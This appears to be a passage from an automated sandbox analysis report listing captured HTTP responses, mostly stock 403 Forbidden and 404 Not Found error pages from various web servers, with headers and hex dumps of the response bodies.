20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oA1H00fK0SMWkHfYYyw04jVKB2Rp97YYu24mKap9uYUbQ1jQ28LT51bHf62DfWTbxZkkK2DVNKO9R7gbrEeLp0ofQD%2BcJGYRjds7Kvvz5FSOA6SyiRm%2FULqeLAOk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a703c8f2ef0-LAXalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 st
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4801Connection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2zj%2BS%2BE8CQQ%2BBbaQW3mZVaEw%2FgGgQ1%2BEqxAUv1GXIynmNMdPoToD9KOdXQYiRdkD2P8fucmZHlSmlS7t98ZUiHG0WRGUKqJc5elOc8g1p5RrzBbUfKZ1Y5EQ8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a8b2e8731e5-LAXalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><m
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:22 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:52:22 GMTServer: Apache/2.4.57 (Ubuntu)Content-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 70 6c 75 73 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at workplus.hu Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 81371a8c2f961036-LAXalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 81371a8c29f27be0-LAXalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:23 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:24 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:24 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1229date: Mon, 09 Oct 2023 13:52:24 GMTserver: LiteSpeedx-hostname: ams111.yourwebhoster.comData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Mon, 09 Oct 2023 13:52:25 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 